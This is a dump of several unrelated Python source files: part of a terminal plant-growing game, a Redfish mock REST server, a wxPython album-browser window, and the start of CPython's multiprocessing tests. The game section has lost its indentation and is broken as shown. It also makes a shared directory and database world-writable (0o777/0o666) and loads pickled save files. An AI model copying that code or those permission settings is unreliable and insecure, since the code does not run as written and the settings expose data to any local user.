# gap of 5 days
# TODO: this considers a plant watered only on day 1 and day 4 to be
# watered for all 4 days - need to figure out how to only add score
# from 24h after each watered timestamp
last_valid_element = next((x for x in timestamp_diffs if x > 5), None)
if not last_valid_element:
# all timestamps are within a 5 day range, can just use latest one
return all_timestamps[-1]
last_valid_index = timestamp_diffs.index(last_valid_element)
# slice list to only include up until a >5 day gap
valid_timestamps = all_timestamps[:last_valid_index + 1]
return valid_timestamps[-1]
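    # Illustrative trace of the gap logic above (hypothetical timestamps):
    # waterings at day 0, day 2 and day 9 give timestamp_diffs of [2.0, 7.0];
    # the first diff > 5 is at index 1, so valid_timestamps is the slice up to
    # and including day 2, and the day-2 timestamp is returned.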
def water_check(self):
self.watered_timestamp = self.guest_check()
self.time_delta_watered = int(time.time()) - self.watered_timestamp
if self.time_delta_watered <= (24 * 3600):
if not self.watered_24h:
self.watered_24h = True
return True
else:
self.watered_24h = False
return False
def mutate_check(self):
# Create plant mutation
# Increase this # to make mutation rarer (chance 1 out of x each second)
CONST_MUTATION_RARITY = 20000
mutation_seed = random.randint(1,CONST_MUTATION_RARITY)
if mutation_seed == CONST_MUTATION_RARITY:
# mutation gained!
mutation = random.randint(0,len(self.mutation_list)-1)
if self.mutation == 0:
self.mutation = mutation
return True
else:
return False
def growth(self):
# Increase plant growth stage
if self.stage < (len(self.stage_list)-1):
self.stage += 1
def water(self):
        # Record the watering time
if not self.dead:
self.watered_timestamp = int(time.time())
self.watered_24h = True
def start_over(self):
# After plant reaches final stage, given option to restart
# increment generation only if previous stage is final stage and plant
# is alive
if not self.dead:
next_generation = self.generation + 1
else:
# Should this reset to 1? Seems unfair.. for now generations will
# persist through death.
next_generation = self.generation
self.write_lock = True
self.kill_plant()
while self.write_lock:
# Wait for garden writer to unlock
# garden db needs to update before allowing the user to reset
pass
if not self.write_lock:
self.__init__(self.file_name, next_generation)
def kill_plant(self):
self.dead = True
def unlock_new_creation(self):
self.write_lock = False
def start_life(self):
# runs life on a thread
thread = threading.Thread(target=self.life, args=())
thread.daemon = True
thread.start()
def life(self):
# I've created life :)
while True:
if not self.dead:
if self.watered_24h:
self.ticks += 1
if self.stage < len(self.stage_list)-1:
if self.ticks >= self.life_stages[self.stage]:
self.growth()
if self.mutate_check():
pass
if self.water_check():
# Do something
pass
if self.dead_check():
# Do something else
pass
# TODO: event check
generation_bonus = 0.2 * (self.generation - 1)
adjusted_sleep_time = 1 / (1 + generation_bonus)
time.sleep(adjusted_sleep_time)
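    # Illustrative values for the sleep scaling above: generation 1 sleeps 1.0s
    # per tick, generation 2 sleeps 1/1.2 ~= 0.83s, generation 3 sleeps
    # 1/1.4 ~= 0.71s, so later generations accumulate score slightly faster.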
class DataManager(object):
# handles user data, puts a .botany dir in user's home dir (OSX/Linux)
# handles shared data with sqlite db
# TODO: .dat save should only happen on mutation, water, death, exit,
# harvest, otherwise
# data hasn't changed...
# can write json whenever bc this isn't ever read for data within botany
user_dir = os.path.expanduser("~")
botany_dir = os.path.join(user_dir,'.botany')
game_dir = os.path.dirname(os.path.realpath(__file__))
this_user = getpass.getuser()
savefile_name = this_user + '_plant.dat'
savefile_path = os.path.join(botany_dir, savefile_name)
#set this.savefile_path to guest_garden path
garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite')
garden_json_path = os.path.join(game_dir, 'garden_file.json')
harvest_file_path = os.path.join(botany_dir, 'harvest_file.dat')
harvest_json_path = os.path.join(botany_dir, 'harvest_file.json')
def __init__(self):
self.this_user = getpass.getuser()
# check if instance is already running
# check for .botany dir in home
try:
os.makedirs(self.botany_dir)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
self.savefile_name = self.this_user + '_plant.dat'
def check_plant(self):
# check for existing save file
if os.path.isfile(self.savefile_path):
return True
else:
return False
def start_threads(self,this_plant):
# creates threads to save files every minute
death_check_thread = threading.Thread(target=self.death_check_update, args=(this_plant,))
death_check_thread.daemon = True
death_check_thread.start()
autosave_thread = threading.Thread(target=self.autosave, args=(this_plant,))
autosave_thread.daemon = True
autosave_thread.start()
def death_check_update(self,this_plant):
# .1 second updates and lock to minimize race condition
while True:
is_dead = this_plant.dead_check()
if is_dead:
self.save_plant(this_plant)
self.data_write_json(this_plant)
self.update_garden_db(this_plant)
self.harvest_plant(this_plant)
this_plant.unlock_new_creation()
time.sleep(.1)
def autosave(self, this_plant):
        # runs on a thread, saves plant every 5s
        # TODO: this is probably unnecessary and may cause file contention
file_update_count = 0
while True:
file_update_count += 1
self.save_plant(this_plant)
self.data_write_json(this_plant)
self.update_garden_db(this_plant)
if file_update_count == 12:
# only update garden json every 60s
self.update_garden_json()
time.sleep(5)
file_update_count %= 12
def load_plant(self):
# load savefile
with open(self.savefile_path, 'rb') as f:
this_plant = pickle.load(f)
# migrate data structure to create data for empty/nonexistent plant
# properties
this_plant.migrate_properties()
# get status since last login
is_watered = this_plant.water_check()
is_dead = this_plant.dead_check()
if not is_dead:
if is_watered:
time_delta_last = int(time.time()) - this_plant.last_time
ticks_to_add = min(time_delta_last, 24*3600)
this_plant.time_delta_watered = 0
self.last_water_gain = time.time()
else:
ticks_to_add = 0
this_plant.ticks += ticks_to_add * (0.2 * (this_plant.generation - 1) + 1)
return this_plant
def plant_age_convert(self,this_plant):
# human-readable plant age
age_seconds = int(time.time()) - this_plant.start_time
days, age_seconds = divmod(age_seconds, 24 * 60 * 60)
hours, age_seconds = divmod(age_seconds, 60 * 60)
minutes, age_seconds = divmod(age_seconds, 60)
age_formatted = ("%dd:%dh:%dm:%ds" % (days, hours, minutes, age_seconds))
return age_formatted
def init_database(self):
# check if dir exists, create sqlite directory and set OS permissions to 777
sqlite_dir_path = os.path.join(self.game_dir,'sqlite')
if not os.path.exists(sqlite_dir_path):
os.makedirs(sqlite_dir_path)
os.chmod(sqlite_dir_path, 0o777)
conn = sqlite3.connect(self.garden_db_path)
init_table_string = """CREATE TABLE IF NOT EXISTS garden (
plant_id tinytext PRIMARY KEY,
owner text,
description text,
age text,
score integer,
is_dead numeric
)"""
c = conn.cursor()
c.execute(init_table_string)
conn.close()
# init only, creates and sets permissions for garden db and json
if os.stat(self.garden_db_path).st_uid == os.getuid():
os.chmod(self.garden_db_path, 0o666)
open(self.garden_json_path, 'a').close()
os.chmod(self.garden_json_path, 0o666)
def migrate_database(self):
conn = sqlite3.connect(self.garden_db_path)
migrate_table_string = """CREATE TABLE IF NOT EXISTS visitors (
id integer PRIMARY KEY,
garden_name text,
visitor_name text,
weekly_visits integer
)"""
c = conn.cursor()
c.execute(migrate_table_string)
conn.close()
return True
def update_garden_db(self, this_plant):
# insert or update this plant id's entry in DB
# TODO: make sure other instances of user are deleted
# Could create a clean db function
self.init_database()
self.migrate_database()
age_formatted = self.plant_age_convert(this_plant)
conn = sqlite3.connect(self.garden_db_path)
c = conn.cursor()
        # insert or replace, using bound parameters
        update_query = """INSERT OR REPLACE INTO garden (
        plant_id, owner, description, age, score, is_dead
        ) VALUES (?, ?, ?, ?, ?, ?)"""
        c.execute(update_query, (this_plant.plant_id,
                                 this_plant.owner,
                                 this_plant.parse_plant(),
                                 age_formatted,
                                 this_plant.ticks,
                                 int(this_plant.dead)))
conn.commit()
conn.close()
def retrieve_garden_from_db(self):
# Builds a dict of dicts from garden sqlite db
garden_dict = {}
conn = sqlite3.connect(self.garden_db_path)
# Need to allow write permissions by others
conn.row_factory = sqlite3.Row
c = conn.cursor()
c.execute('SELECT * FROM garden ORDER BY owner')
tuple_list = c.fetchall()
conn.close()
# Building dict from table rows
for item in tuple_list:
garden_dict[item[0]] = {
"owner":item[1],
"description":item[2],
"age":item[3],
"score":item[4],
"dead":item[5],
}
return garden_dict
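    # Shape of the returned dict (field names from the query above; values are
    # illustrative): {'<plant_id>': {'owner': 'alice', 'description': '...',
    # 'age': '1d:2h:3m:4s', 'score': 86400, 'dead': 0}, ...}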
def update_garden_json(self):
this_garden = self.retrieve_garden_from_db()
with open(self.garden_json_path, 'w') as outfile:
json.dump(this_garden, outfile)
pass
def save_plant(self, this_plant):
# create savefile
this_plant.last_time = int(time.time())
temp_path = self.savefile_path + ".temp"
with open(temp_path, 'wb') as f:
pickle.dump(this_plant, f, protocol=2)
os.rename(temp_path, self.savefile_path)
def data_write_json(self, this_plant):
# create personal json file for user to use outside of the game (website?)
json_file = os.path.join(self.botany_dir,self.this_user + '_plant_data.json')
# also updates age
age_formatted = self.plant_age_convert(this_plant)
plant_info = {
"owner":this_plant.owner,
"description":this_plant.parse_plant(),
"age":age_formatted,
"score":this_plant.ticks,
"is_dead":this_plant.dead,
"last_watered":this_plant.watered_timestamp,
"file_name":this_plant.file_name,
"stage": this_plant.stage_list[this_plant.stage],
"generation": this_plant.generation,
}
if this_plant.stage >= 3:
plant_info["rarity"] = this_plant.rarity_list[this_plant.rarity]
if this_plant.mutation != 0:
plant_info["mutation"] = this_plant.mutation_list[this_plant.mutation]
if this_plant.stage >= 4:
plant_info["color"] = this_plant.color_list[this_plant.color]
if this_plant.stage >= 2:
plant_info["species"] = this_plant.species_list[this_plant.species]
with open(json_file, 'w') as outfile:
json.dump(plant_info, outfile)
def harvest_plant(self, this_plant):
# TODO: plant history feature - could just use a sqlite query to retrieve all of user's dead plants
# harvest is a dict of dicts
# harvest contains one entry for each plant id
age_formatted = self.plant_age_convert(this_plant)
this_plant_id = this_plant.plant_id
plant_info = {
"description":this_plant.parse_plant(),
"age":age_formatted,
"score":this_plant.ticks,
}
if os.path.isfile(self.harvest_file_path):
# harvest file exists: load data
with open(self.harvest_file_path, 'rb') as f:
this_harvest = pickle.load(f)
new_file_check = False
else:
this_harvest = {}
new_file_check = True
this_harvest[this_plant_id] = plant_info
# dump harvest file
temp_path = self.harvest_file_path + ".temp"
with open(temp_path, 'wb') as f:
pickle.dump(this_harvest, f, protocol=2)
os.rename(temp_path, self.harvest_file_path)
# dump json file
with open(self.harvest_json_path, 'w') as outfile:
json.dump(this_harvest, outfile)
return new_file_check
if __name__ == '__main__':
my_data = DataManager()
# if plant save file exists
if my_data.check_plant():
my_plant = my_data.load_plant()
# otherwise create new plant
else:
my_plant = Plant(my_data.savefile_path)
my_data.data_write_json(my_plant)
# my_plant is either a fresh plant or an existing plant at this point
my_plant.start_life()
my_data.start_threads(my_plant)
try:
botany_menu = CursedMenu(my_plant,my_data)
my_data.save_plant(my_plant)
my_data.data_write_json(my_plant)
my_data.update_garden_db(my_plant)
finally:
cleanup()
|
server.py
|
#!/usr/bin/env python3
#
# (C) Copyright 2020 Hewlett Packard Enterprise Development LP.
# Licensed under the Apache v2.0 license.
#
import re
import os
import sys
import json
import glob
import copy
import importlib
from log import Log
from threading import Thread
from http.server import HTTPServer
from http.server import BaseHTTPRequestHandler
# ----------------------------------------------------------------------------------------------------------------------
def browser_update(node):
def is_redfish(value): return type(value) is str and value.startswith('/redfish/v1')
def href(value): return '<a href={0}>{0}</a>'.format(value)
if type(node) is list:
for i,value in enumerate(node):
if is_redfish(value): node[i] = href(value)
browser_update(node[i])
elif type(node) is dict:
for key,value in node.items():
if is_redfish(value): node[key] = href(value)
browser_update(value)
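# For example (illustrative only), browser_update({'@odata.id': '/redfish/v1/Systems'})
# rewrites the value in place to '<a href=/redfish/v1/Systems>/redfish/v1/Systems</a>'
# so that the JSON rendered in a browser becomes clickable.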
# ----------------------------------------------------------------------------------------------------------------------
#
# Method Scope Semantics
# ------- ---------- ----------------------------------------------------
# GET collection Retrieve all resources in a collection
# GET resource Retrieve a single resource
# HEAD collection Retrieve all resources in a collection (header only)
# HEAD resource Retrieve a single resource (header only)
# POST collection Create a new resource in a collection
# PUT resource Update a resource
# PATCH resource Update a resource
# DELETE resource Delete a resource
# OPTIONS any Return available HTTP methods and other options
#
# ----------------------------------------------------------------------------------------------------------------------
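# Example requests against the mock (illustrative only; assumes the profile
# address resolves to localhost:8081 and that a Systems collection exists):
#   curl http://localhost:8081/redfish/v1/Systems                              # GET collection
#   curl -X POST   -d '{"Name": "node1"}'  http://localhost:8081/redfish/v1/Systems
#   curl -X PATCH  -d '{"AssetTag": "A1"}' http://localhost:8081/redfish/v1/Systems/1
#   curl -X DELETE http://localhost:8081/redfish/v1/Systems/1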
class RestHandler(BaseHTTPRequestHandler):
def normalize_path(self, path):
new_path = path
#
# Prepend '/' if needed.
# If the file name doesn't begin with '/redfish/v1', then add it.
# If the file name ends with 'index.json', remove it.
# Strip off the trailing '/'.
#
if new_path == '/':
new_path = self.server.env['redfish_base']
if new_path[0] != '/':
new_path = '/{}'.format(new_path)
if not new_path.startswith(self.server.env['redfish_base']):
            new_path = '{}{}'.format(self.server.env['redfish_base'], new_path)
if new_path[-1] == '/':
new_path = new_path[:-1]
if new_path.endswith('/index.json'):
new_path = new_path.rsplit('/',1)[0]
return new_path
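    # Example (illustrative): with redfish_base == '/redfish/v1', a request for
    # '/Systems/1/index.json' normalizes to '/redfish/v1/Systems/1', and '/'
    # normalizes to '/redfish/v1' itself.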
def log_message(self, format, *args):
return
# ----------------------------------------------------------------------------------------------
def reply(self, status, headers=None, data=None):
        encoded_data = data.encode() if data else None
        if headers and 'Content-Length' not in headers:
            # len(None) would raise when replying with headers but no body
            headers['Content-Length'] = str(len(encoded_data)) if encoded_data else '0'
try:
self.send_response(status)
if headers:
for key,value in headers.items():
self.send_header(key, value)
self.end_headers()
if encoded_data:
self.wfile.write(encoded_data)
except:
Log.info('can\'t reply to requester')
# ----------------------------------------------------------------------------------------------
def do_HEAD(self):
Log.info('HEAD {}', self.path)
# ----------------------------------------------------------------------------------------------
def do_GET(self):
Log.info('GET {}', self.path)
path = self.normalize_path(self.path)
#
# If we don't know this resource, send 404.
#
if path not in self.server.attributes:
self.reply(404)
return
#
# Get the resource. Update the links if requested.
#
data = copy.deepcopy(self.server.attributes[path])
if self.server.env['browser']:
browser_update(data)
data = '<pre>' + json.dumps(data, indent=4, separators=(',', ': ')) + '</pre>'
content_type = 'text/html'
else:
data = json.dumps(data, indent=4, separators=(',', ': '))
content_type = 'application/json'
headers = { 'Content-Type' : content_type,
'Cache-Control' : 'no-cache, no-store, must-revalidate',
'Pragma' : 'no-cache',
'Expires' : '0' }
self.reply(200, headers, data)
# ----------------------------------------------------------------------------------------------
def do_POST(self):
Log.info('POST {}', self.path)
path = self.normalize_path(self.path)
data_length = int(self.headers['Content-Length'])
try:
data = json.loads(self.rfile.read(data_length).decode('utf-8'))
except Exception as e:
Log.info('invalid POST request - JSON improperly formatted')
self.reply(400)
return
#
# If the resource doesn't exist, then 404.
# If the resource isn't a collection, then 405.
# Otherwise, 204
#
if path not in self.server.attributes:
self.reply(404)
elif 'Members' not in self.server.attributes[path]:
self.reply(405)
else:
#
# Find a resource id for the new entry.
#
resource = self.server.attributes[path]
members = resource['Members']
members_id = sorted([ int(x.get('@odata.id').rsplit('/',1)[1]) for x in members ])
            last = members_id[0] if members_id else 0
for x in members_id[1:]:
if x != last+1: break
last = x
#
# Name the new entry.
#
new_id = last + 1
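            # e.g. (illustrative) existing member ids [1, 2, 4]: the loop stops
            # with last == 2, so new_id == 3; with no members at all, new_id == 1.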
data_id = '{}/{}'.format(path, new_id)
data['@odata.id'] = data_id
#
# Update the resource to include the new entry.
#
resource['Members'].append({'@odata.id' : data_id })
resource['Members@odata.count'] += 1
#
# Put the new entry into the tree.
#
self.server.attributes[data_id] = data
#
# Reply to the user.
#
headers = { 'Location' : data_id }
self.reply(204, headers)
# ----------------------------------------------------------------------------------------------
def do_PUT(self):
Log.info('PUT {}', self.path)
self.reply(405)
# ----------------------------------------------------------------------------------------------
def do_PATCH(self):
Log.info('PATCH {}', self.path)
path = self.normalize_path(self.path)
        data_length = int(self.headers['Content-Length'])
        body = self.rfile.read(data_length)
        try:
            data = json.loads(body.decode('utf-8'))
        except Exception:
            # 'data' is never bound when parsing fails, so log the raw body instead
            Log.info('invalid PATCH request - JSON improperly formatted {} -> {}', data_length, body)
            self.reply(400)
            return
#
# If the resource doesn't exist, then 404.
# If the resource is a collection, then 405.
# Otherwise, 204.
#
if path not in self.server.attributes:
status = 404
elif 'Members' in self.server.attributes[path]:
status = 405
else:
status = 204
self.server.node.do_PATCH(path, data)
#
# Reply to user.
#
self.reply(status)
# ----------------------------------------------------------------------------------------------
def do_DEEPPATCH(self):
Log.info('DEEPPATCH {}', self.path)
self.reply(405)
# ----------------------------------------------------------------------------------------------
def do_DELETE(self):
Log.info('DELETE {}', self.path)
path = self.normalize_path(self.path)
parent_path = path.rsplit('/', 1)[0]
#
# If the resource doesn't exist, then 404.
# If the parent doesn't exist, then 405.
# If the parent isn't a collection, then 405.
# Otherwise, 204
#
if path not in self.server.attributes:
status = 404
elif parent_path not in self.server.attributes:
status = 405
elif 'Members' not in self.server.attributes[parent_path]:
status = 405
else:
status = 204
del self.server.attributes[path]
for i,m in enumerate(self.server.attributes[parent_path]['Members']):
                if m['@odata.id'] == path:
del self.server.attributes[parent_path]['Members'][i]
self.server.attributes[parent_path]['Members@odata.count'] -= 1
break
#
# Reply to user.
#
self.reply(status)
# ----------------------------------------------------------------------------------------------------------------------
class RedfishServer():
def __init__(self, node):
#
        # Set up the Redfish server.
#
addr,_,port = node.env['profile']['address'].partition(':')
if not port: port = '8081'
self.server = HTTPServer((addr, int(port)), RestHandler)
self.server.node = node
self.server.env = node.env
self.server.attributes = node.env['attributes']
#
        # Create the Redfish thread.
#
self.thread = Thread(target=self.run, daemon=True)
def run(self):
self.server.serve_forever()
def start(self):
self.thread.start()
# ----------------------------------------------------------------------------------------------------------------------
|
browse.py
|
import logging
import sys
import time
import webbrowser
import wx
from threading import Thread
from wx.lib.mixins.listctrl import ListCtrlAutoWidthMixin
from .util import get_bitmap
from ..util import get_releases, get_picture
log = logging.getLogger(__name__)
THUMB_SIZE = 100
LOOK_AHEAD = 30
class BrowseFrame(wx.Frame):
def __init__(self, parent):
wx.Frame.__init__(self, parent, -1,
title="DNAP",
style=wx.RESIZE_BORDER | wx.CLOSE_BOX | wx.CAPTION | wx.CLIP_CHILDREN | wx.STAY_ON_TOP
)
self.adding_items = False
self.thread = None
self.releases = sorted(get_releases(), key=lambda release: -release["first_seen"])
self.labels = ["all"] + sorted(list(set([release["source"] for release in self.releases])))
self.current_label = None
self.init_position(435, 730)
self.init_content()
self.show_releases("all")
def init_position(self, width, height):
# FIXME: Find current display id
display_area = wx.Display(0).GetClientArea()
display_width, display_height = display_area.GetWidth(), display_area.GetHeight()
self.SetSize((width, height))
if sys.platform == "darwin":
# Top-right
title_bar_height = self.GetRect().height - self.GetClientRect().height
position = (display_width - width, title_bar_height)
else:
# Bottom-right
position = (display_width - width, display_height - height)
self.SetPosition(position)
def init_content(self):
sizer = wx.BoxSizer(wx.VERTICAL)
combo = wx.Choice(self, -1, choices=self.labels)
combo.SetSelection(0)
self.Bind(wx.EVT_CHOICE, lambda e: self.show_releases(e.GetString()))
self.init_list()
self.image_list = wx.ImageList(THUMB_SIZE, THUMB_SIZE)
self.list.SetImageList(self.image_list, wx.IMAGE_LIST_SMALL)
sizer.Add(combo, flag=wx.EXPAND | wx.ALL, border=5)
sizer.Add(self.list, proportion=1, flag=wx.EXPAND | wx.ALL ^ wx.TOP, border=5)
self.SetSizer(sizer)
def init_list(self):
class AutoWidthListCtrl(wx.ListCtrl, ListCtrlAutoWidthMixin):
def __init__(self, *args, **kwargs):
wx.ListCtrl.__init__(self, *args, **kwargs)
ListCtrlAutoWidthMixin.__init__(self)
self.list = AutoWidthListCtrl(self, style=wx.LC_REPORT | wx.LC_SINGLE_SEL | wx.LC_NO_HEADER)
self.list.setResizeColumn(2)
self.list.Bind(wx.EVT_SCROLLWIN, self.handle_scroll)
self.list.Bind(wx.EVT_MOUSEWHEEL, self.handle_scroll)
self.list.Bind(wx.EVT_MOTION, self.handle_hover)
self.list.Bind(wx.EVT_LEFT_UP, self.handle_click)
cover_column = wx.ListItem()
cover_column.SetMask(wx.LIST_MASK_TEXT)
cover_column.SetText("Cover")
cover_column.SetWidth(THUMB_SIZE + 8)
self.list.InsertColumn(0, cover_column)
album_column = wx.ListItem()
album_column.SetMask(wx.LIST_MASK_TEXT)
album_column.SetText("Album")
album_column.SetWidth(210)
self.list.InsertColumn(1, album_column)
price_column = wx.ListItem()
price_column.SetMask(wx.LIST_MASK_TEXT)
price_column.SetAlign(wx.LIST_FORMAT_RIGHT)
price_column.SetText("Price")
price_column.SetWidth(70)
self.list.InsertColumn(2, price_column)
self.list.setResizeColumn(2)
def handle_scroll(self, event):
event.Skip()
if self.list.GetItemCount() == len(self.current_releases):
return
pos = self.list.GetScrollPos(wx.VERTICAL)
if pos >= self.list.GetItemCount() - LOOK_AHEAD:
if self.thread and self.thread.is_alive():
return
self.thread = Thread(target=self.add_releases, args=(LOOK_AHEAD,))
self.thread.start()
def add_release(self, release, release_index):
bmp = get_bitmap(release, resize_width=THUMB_SIZE)
image_index = self.image_list.Add(bmp)
index = self.list.InsertItem((1 << 31) - 1, image_index)
self.list.SetItem(index, 1, " %s – %s" % (release["source"], release["title"]))
self.list.SetItem(index, 2, release["price"])
self.list.SetItemData(index, release_index)
def add_releases(self, count):
if self.adding_items:
return
self.adding_items = True
log.debug("Adding %d more items to list..." % count)
start = self.list.GetItemCount()
end = min((start + count, len(self.current_releases)))
for i in range(start, end):
if not self.adding_items:
break
get_picture(self.current_releases[i]) # Preloading the image while still in the thread
wx.CallAfter(self.add_release, self.current_releases[i], i) # Called on main thread
time.sleep(0.01)
self.adding_items = False
def show_releases(self, label):
if label == self.current_label:
return
if self.thread and self.thread.is_alive():
self.adding_items = False
while self.thread.is_alive():
time.sleep(0.01)
self.current_label = label
if label == "all":
self.current_releases = self.releases
else:
self.current_releases = [release for release in self.releases if release["source"] == label]
self.list.DeleteAllItems()
self.image_list.RemoveAll()
to_load = self.list.GetCountPerPage() + LOOK_AHEAD
self.thread = Thread(target=self.add_releases, args=(to_load,))
self.thread.start()
def hovered_index(self, event):
pos = event.GetPosition()
item = self.list.HitTest(pos)
if item and len(item) > 0:
index = item[0]
if index >= 0:
return index
def handle_hover(self, event):
event.Skip()
index = self.hovered_index(event)
if index is not None and not self.list.IsSelected(index):
self.list.Select(index)
self.Raise()
self.list.SetFocus()
def handle_click(self, event):
event.Skip()
index = self.hovered_index(event)
if index is not None:
release_index = self.list.GetItemData(index)
release = self.current_releases[release_index]
webbrowser.open(release["link"])
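# Minimal launch sketch (illustrative only; assumes this module is imported as
# part of its package so the relative imports resolve):
#   app = wx.App(False)
#   BrowseFrame(None).Show()
#   app.MainLoop()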
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
from test.support import socket_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
    # Since multiprocessing.Process has the same API as threading.Thread
    # (join() and is_alive()), the support function can be reused
support.join_thread(process)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
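# e.g. (illustrative) timed = TimingWrapper(time.sleep); timed(0.1)
# leaves timed.elapsed at roughly 0.1 seconds.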
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
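# e.g. (illustrative) get_value(multiprocessing.Semaphore(2)) returns 2 where the
# platform supports sem_getvalue, and raises NotImplementedError otherwise.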
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
